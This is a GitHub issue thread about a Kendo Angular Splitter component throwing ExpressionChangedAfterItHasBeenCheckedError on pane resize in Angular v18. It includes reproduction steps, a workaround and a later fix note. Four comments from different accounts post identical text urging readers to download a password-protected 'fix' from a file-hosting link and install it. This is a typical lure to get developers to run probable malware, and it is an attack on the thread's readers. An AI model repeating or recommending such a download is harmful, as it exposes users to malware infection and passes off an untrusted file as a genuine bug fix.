### ISSUE TITLE
[Splitter] ExpressionChangedAfterItHasBeenCheckedError is thrown when resizing the pane in Angular v18

### ISSUE THREAD

**Issue by georgi-sla** [telerik/kendo-angular#4390]
**To Reproduce**
1. Create a Splitter component in an Angular v18 app.
2. Make sure that the panes of the component are resizable.
3. Open the Console in DevTools.
4. Try to resize any of the component panes.

Please, check out the following StackBlitz demo for further reference: https://stackblitz.com/edit/angular-jqeh1c

**Expected behavior**
Resizing the panes of the Splitter component should not cause errors.

**Screenshots**
<img width="720" alt="image" src="https://github.com/user-attachments/assets/b7b53009-fb4c-4cb8-9e87-fb42e4e10bb9">

**Workaround**
Handling the [layoutChange](https://www.telerik.com/kendo-angular-ui/components/layout/api/SplitterComponent/#toc-layoutchange) event of the Splitter component seems to resolve the error:

https://stackblitz.com/edit/angular-jqeh1c-qp8gfj

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Raisolution** [comment]
Fixed in v17.0.0
